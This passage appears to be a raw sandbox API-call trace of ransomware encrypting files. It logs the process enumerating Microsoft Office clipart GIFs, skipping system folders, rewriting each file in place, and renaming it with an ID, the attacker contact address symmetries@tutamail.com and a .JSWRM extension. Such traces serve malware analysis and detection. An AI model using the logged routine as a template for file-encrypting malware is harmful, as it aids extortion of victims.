MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0099.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0099.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0099.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0099.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0099.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0099.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0099.926] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143746.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143746.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0099.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0099.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0099.927] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1107d049, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11d1, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="J0143748.GIF", cAlternateFileName="")) returned 1 [0099.927] lstrcmpiW (lpString1="J0143748.GIF", lpString2=".") returned 1 [0099.927] lstrcmpiW (lpString1="J0143748.GIF", lpString2="..") returned 1 [0099.927] lstrcmpiW (lpString1="J0143748.GIF", lpString2="...") returned 1 [0099.927] lstrcmpiW (lpString1="J0143748.GIF", lpString2="windows") returned -1 [0099.927] lstrcmpiW (lpString1="J0143748.GIF", lpString2="recovery") returned -1 [0099.927] lstrcmpiW (lpString1="J0143748.GIF", lpString2="perflogs") returned -1 [0099.927] lstrcmpiW (lpString1="J0143748.GIF", lpString2="documents and settings") returned 1 [0099.927] lstrcmpiW (lpString1="J0143748.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.927] lstrcmpiW (lpString1="J0143748.GIF", lpString2="system volume information") returned -1 [0099.927] lstrcmpiW (lpString1="J0143748.GIF", lpString2="msocache") returned -1 [0099.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0099.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143748.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143748.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143748.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0099.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0099.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143748.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143748.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143748.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0099.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0099.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0099.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0099.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143748.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0099.928] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4561) returned 1 [0099.928] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11d0) returned 0x24d210 [0099.929] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0x11d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0x11d0, lpOverlapped=0x0) returned 1 [0099.930] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.930] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x11d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0x11d0, lpOverlapped=0x0) returned 1 [0099.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0099.930] CloseHandle (hObject=0x338) returned 1 [0099.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0099.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0099.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0099.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0099.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0099.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0099.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0099.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0099.931] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143748.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143748.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0099.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0099.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0099.932] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1107d049, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1323, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="J0143749.GIF", cAlternateFileName="")) returned 1 [0099.932] lstrcmpiW (lpString1="J0143749.GIF", lpString2=".") returned 1 [0099.932] lstrcmpiW (lpString1="J0143749.GIF", lpString2="..") returned 1 [0099.932] lstrcmpiW (lpString1="J0143749.GIF", lpString2="...") returned 1 [0099.932] lstrcmpiW (lpString1="J0143749.GIF", lpString2="windows") returned -1 [0099.932] lstrcmpiW (lpString1="J0143749.GIF", lpString2="recovery") returned -1 [0099.932] lstrcmpiW (lpString1="J0143749.GIF", lpString2="perflogs") returned -1 [0099.932] lstrcmpiW (lpString1="J0143749.GIF", lpString2="documents and settings") returned 1 [0099.932] lstrcmpiW (lpString1="J0143749.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.932] lstrcmpiW (lpString1="J0143749.GIF", lpString2="system volume information") returned -1 [0099.932] lstrcmpiW (lpString1="J0143749.GIF", lpString2="msocache") returned -1 [0099.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0099.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143749.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143749.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143749.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0099.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0099.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143749.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143749.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143749.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0099.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0099.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0099.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0099.932] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143749.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0099.933] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4899) returned 1 [0099.933] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1320) returned 0x24d210 [0099.933] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1320, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0x1320, lpOverlapped=0x0) returned 1 [0099.935] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.935] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0x1320, lpOverlapped=0x0) returned 1 [0099.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0099.935] CloseHandle (hObject=0x338) returned 1 [0099.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0099.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0099.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0099.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0099.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0099.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0099.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0099.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0099.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.936] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143749.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143749.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143749.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0099.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0099.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0099.936] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1107d049, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x43e, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="J0143750.GIF", cAlternateFileName="")) returned 1 [0099.936] lstrcmpiW (lpString1="J0143750.GIF", lpString2=".") returned 1 [0099.936] lstrcmpiW (lpString1="J0143750.GIF", lpString2="..") returned 1 [0099.936] lstrcmpiW (lpString1="J0143750.GIF", lpString2="...") returned 1 [0099.937] lstrcmpiW (lpString1="J0143750.GIF", lpString2="windows") returned -1 [0099.937] lstrcmpiW (lpString1="J0143750.GIF", lpString2="recovery") returned -1 [0099.937] lstrcmpiW (lpString1="J0143750.GIF", lpString2="perflogs") returned -1 [0099.937] lstrcmpiW (lpString1="J0143750.GIF", lpString2="documents and settings") returned 1 [0099.937] lstrcmpiW (lpString1="J0143750.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.937] lstrcmpiW (lpString1="J0143750.GIF", lpString2="system volume information") returned -1 [0099.937] lstrcmpiW (lpString1="J0143750.GIF", lpString2="msocache") returned -1 [0099.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143750.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143750.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143750.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0099.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143750.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143750.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143750.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0099.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0099.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0099.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0099.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143750.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143750.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0099.937] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1086) returned 1 [0099.938] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x430) returned 0x230a00 [0099.938] ReadFile (in: hFile=0x338, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0099.939] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.939] WriteFile (in: hFile=0x338, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0099.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0099.939] CloseHandle (hObject=0x338) returned 1 [0099.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0099.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0099.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0099.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0099.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0099.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0099.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0099.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0099.940] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143750.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143750.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143750.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143750.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0099.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | 